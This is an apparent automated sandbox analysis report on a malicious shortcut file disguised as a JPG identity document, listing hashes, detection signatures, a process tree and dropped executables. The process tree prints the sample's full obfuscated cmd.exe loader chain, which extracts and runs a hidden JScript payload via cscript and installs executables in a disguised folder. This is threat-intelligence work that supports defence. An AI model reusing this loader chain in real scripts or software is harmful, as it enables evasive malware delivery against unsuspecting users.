Analysis
- max time kernel: 4294197s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20220311-en
- submitted: 17-03-2022 13:21
Behavioral tasks
- behavioral1: sample CopyIdentityLicense.jpg.lnk, resource win7-20220311-en
- behavioral2: sample CopyIdentityLicense.jpg.lnk, resource win10v2004-20220310-en
- behavioral3: sample CopySwisscomstatement.pdf, resource win7-20220311-en
- behavioral4: sample CopySwisscomstatement.pdf, resource win10v2004-20220310-en
General
- Target: CopyIdentityLicense.jpg.lnk
- Size: 602KB
- MD5: d1f069c6021aba84d1fa010295312315
- SHA1: 85f3f53c12a8bb7d9525b5d30ec51fdc354c1a21
- SHA256: a0ec772fd0d24ce6e5c8ffd9ec018f3b2463d6d0246d8cb9b8bbbe9230dba330
- SHA512: 710be7d2ad7f1ad2416b29b4d4b6ebd335ecdeb778b41ea2e12a3b4ef6a6df4f2e5908117b58a15e96dfde8e3bf79b7da6ba362b915ffb33e9aef904df91edf9
Signatures
- Executes dropped EXE (2 IoCs)
  Processes: main.exe (PID 1704), RdrCER.exe (PID 988)
- Deletes itself (1 IoC)
  Processes: cscript.exe (PID 1556)
- Loads dropped DLL (4 IoCs)
  Processes: main.exe (PID 1704), 4 loads
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: RenamesItself (1 IoC)
  Processes: cmd.exe (PID 1956)
- Suspicious use of WriteProcessMemory (50 IoCs)
  Distinct source/target pairs (the raw report records each call several times):

  Source PID  Source process  Target PID  Target process
  1800        cmd.exe         1492        cmd.exe
  1492        cmd.exe         2028        PING.EXE
  1492        cmd.exe         2020        cmd.exe
  2020        cmd.exe         1052        fc.exe
  2020        cmd.exe         1088        cmd.exe
  1088        cmd.exe         656         chkdsk.exe
  1088        cmd.exe         2000        cmd.exe
  1088        cmd.exe         1236        find.exe
  1088        cmd.exe         1956        cmd.exe
  1956        cmd.exe         956         sort.exe
  1956        cmd.exe         1872        cmd.exe
  1872        cmd.exe         952         cscript.exe
  952         cscript.exe     1556        cscript.exe
  1972        taskeng.exe     1704        main.exe
  1704        main.exe        988         RdrCER.exe
Processes (indented by depth in the process tree)

[1] C:\Windows\system32\cmd.exe (PID 1800)
    Command: cmd /c C:\Users\Admin\AppData\Local\Temp\CopyIdentityLicense.jpg.lnk
    Signatures: Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\cmd.exe (PID 1492)
      Command: "C:\Windows\System32\cmd.exe" /c ping /? & set yc=Ve& cmd /c "echo hello& set he=cS& set lq=%cd%& flash /? & set ne=mO& ver &set eo=ip& set ua=C:\Users\Admin\AppData\Local\Temp\&fc &set gd=dat& set pv=*.z& cmd /c "set gp=//^& (for /d %i in ("%ua%%pv%%eo%") do echo ok ^& for %e in ("%i\Co*pg*") do cd %i ^& set u=1) ^& set bm=cr^& chkdsk /? ^& set pl=cO^& set ox=:J^& type "Co*pg*"^|find "VER1"^>"%ua%wct7ZD7ASHB.%gd%" ^& cmd /c " title run ^& (if not %u%==1 (%ne%%yc% /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) ^& sort /? ^& cd %lq% ^& date /? ^& set zu=%he%%bm%%eo%t ^& cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" ^& echo dn""""
      Signatures: Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\PING.EXE (PID 2028)
        Command: ping /?
        Signatures: Runs ping.exe

    [3] C:\Windows\system32\cmd.exe (PID 2020)
        Command: cmd /c "echo hello& set he=cS& set lq=C:\Users\Admin\AppData\Local\Temp& flash /? & set ne=mO& ver &set eo=ip& set ua=C:\Users\Admin\AppData\Local\Temp\&fc &set gd=dat& set pv=*.z& cmd /c "set gp=//& (for /d %i in ("%ua%%pv%%eo%") do echo ok & for %e in ("%i\Co*pg*") do cd %i & set u=1) & set bm=cr& chkdsk /? & set pl=cO& set ox=:J& type "Co*pg*"|find "VER1">"%ua%wct7ZD7ASHB.%gd%" & cmd /c " title run ^& (if not %u%==1 (%ne%%yc% /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) ^& sort /? ^& cd %lq% ^& date /? ^& set zu=%he%%bm%%eo%t ^& cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" & echo dn""""
        Signatures: Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\fc.exe (PID 1052)
          Command: fc

      [4] C:\Windows\system32\cmd.exe (PID 1088)
          Command: cmd /c "set gp=//& (for /d %i in ("%ua%%pv%%eo%") do echo ok & for %e in ("%i\Co*pg*") do cd %i & set u=1) & set bm=cr& chkdsk /? & set pl=cO& set ox=:J& type "Co*pg*"|find "VER1">"%ua%wct7ZD7ASHB.%gd%" & cmd /c " title run & (if not %u%==1 (%ne%Ve /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) & sort /? & cd %lq% & date /? & set zu=%he%%bm%%eo%t & cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" & echo dn"""
          Signatures: Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\chkdsk.exe (PID 656)
            Command: chkdsk /?

        [5] C:\Windows\system32\cmd.exe (PID 2000)
            Command: C:\Windows\system32\cmd.exe /S /D /c" type "Co*pg*""

        [5] C:\Windows\system32\find.exe (PID 1236)
            Command: find "VER1"

        [5] C:\Windows\system32\cmd.exe (PID 1956)
            Command: cmd /c " title run & (if not %u%==1 (mOVe /y "Co*pg* " "C:\Users\Admin\AppData\Local\Temp\") else (%pl%Py /y "Co*pg* " "C:\Users\Admin\AppData\Local\Temp\" )) & sort /? & cd C:\Users\Admin\AppData\Local\Temp & date /? & set zu=cS%bm%ipt & cmd /c " %zu% "%gp%E%ox%S%bm%ipt" "C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat"
            Signatures: Suspicious behavior: RenamesItself; Suspicious use of WriteProcessMemory

          [6] C:\Windows\system32\sort.exe (PID 956)
              Command: sort /?

          [6] C:\Windows\system32\cmd.exe (PID 1872)
              Command: cmd /c " %zu% "//E:JScript" "C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat
              Signatures: Suspicious use of WriteProcessMemory

            [7] C:\Windows\system32\cscript.exe (PID 952)
                Command: cScript "//E:JScript" C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat
                Signatures: Suspicious use of WriteProcessMemory

              [8] C:\Windows\System32\cscript.exe (PID 1556)
                  Command: "C:\Windows\System32\cscript.exe" "//E:JScript" "C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\Templates\wct02CJI0.dat"
                  Signatures: Deletes itself

[1] C:\Windows\system32\taskeng.exe (PID 1972)
    Command: taskeng.exe {9FCBC35C-5400-47A0-B244-B29CF99B3AF0} S-1-5-21-2199625441-3471261906-229485034-1000:DRLQIXCW\Admin:Interactive:[1]
    Signatures: Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exe (PID 1704)
      Command: C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exe -p"29GGZr" -sp"""NDI0MjQyNDItNDI0Mi00MjQyLTQyNDItNDI0MjQyNDI0MjQy"" ""devDISMWKI.tmp"" ""NTM0OTQ0"" ""Ni4xLjc2MDE%3D"" 0 ""65C36820"" ""MzE4NTQ5d2N0ZH1hcGZkdFBUWl8%3D"" 0"
      Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory

    [3] C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe (PID 988)
        Command: "C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe" "NDI0MjQyNDItNDI0Mi00MjQyLTQyNDItNDI0MjQyNDI0MjQy" "devDISMWKI.tmp" "NTM0OTQ0" "Ni4xLjc2MDE%3D" 0 "65C36820" "MzE4NTQ5d2N0ZH1hcGZkdFBUWl8%3D" 0
        Signatures: Executes dropped EXE
Downloads (dropped files)
- C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe
  MD5: e1b17e3ed49f8b4f08c9bef6e17c4a47
  SHA1: f18ba69c54664e0bc801e9de4d7096dd3b4ec3b8
  SHA256: c98769032c8f8cb984c44fabbaf81c53953df2d2d85d2c2f07c91f8b74601de5
  SHA512: e88ea017661d9bb1110b46ab69abe9ab86d031cd988b57f5eab603accbdd14ca40a3ad7abc2457583e17482c11fc93706cd2312d6247bc5cd1bf0da3b2524d0a
- C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\Templates\wct02CJI0.dat
  MD5: 59ccd44bbee1ab8e2a93f5e336938990
  SHA1: cc840273d4c785de3f43bf69d0ea1d5a166bcd44
  SHA256: a90c5cb345c78070df226f60480d61d2bef39113d74caec2b5fbae225f69235f
  SHA512: 2f586df75cbb0b76022c393101bceb8be828af88a726e36b7e3f488ac94751f6cbd0295a3e7df567efa8a1f975432ffe66b9f639cdc9b171c2990dd17a363e83
- C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exe
  MD5: f3faa3ce284dea4709353aa4fd17b11e
  SHA1: 3903fc1d299e435288f123e538f2a3912e5f5813
  SHA256: 1ddd3a76aa87e3b122da83119abc270cc3e6109f41e4a96dc7b6260162e75f31
  SHA512: fae7a385b8da1dadc66b2a296976fcc683f0fa829812237359cae9d3304eeafb1d582fe5ddcd0ba365cf85735ec577686136bd442e77b1efc792188860a918c2
- C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat (same hashes as wct02CJI0.dat above)
  MD5: 59ccd44bbee1ab8e2a93f5e336938990
  SHA1: cc840273d4c785de3f43bf69d0ea1d5a166bcd44
  SHA256: a90c5cb345c78070df226f60480d61d2bef39113d74caec2b5fbae225f69235f
  SHA512: 2f586df75cbb0b76022c393101bceb8be828af88a726e36b7e3f488ac94751f6cbd0295a3e7df567efa8a1f975432ffe66b9f639cdc9b171c2990dd17a363e83
Memory dumps
- memory/1704-95-0x0000000075081000-0x0000000075083000-memory.dmp (8KB)
- memory/1800-54-0x000007FEFB551000-0x000007FEFB553000-memory.dmp (8KB)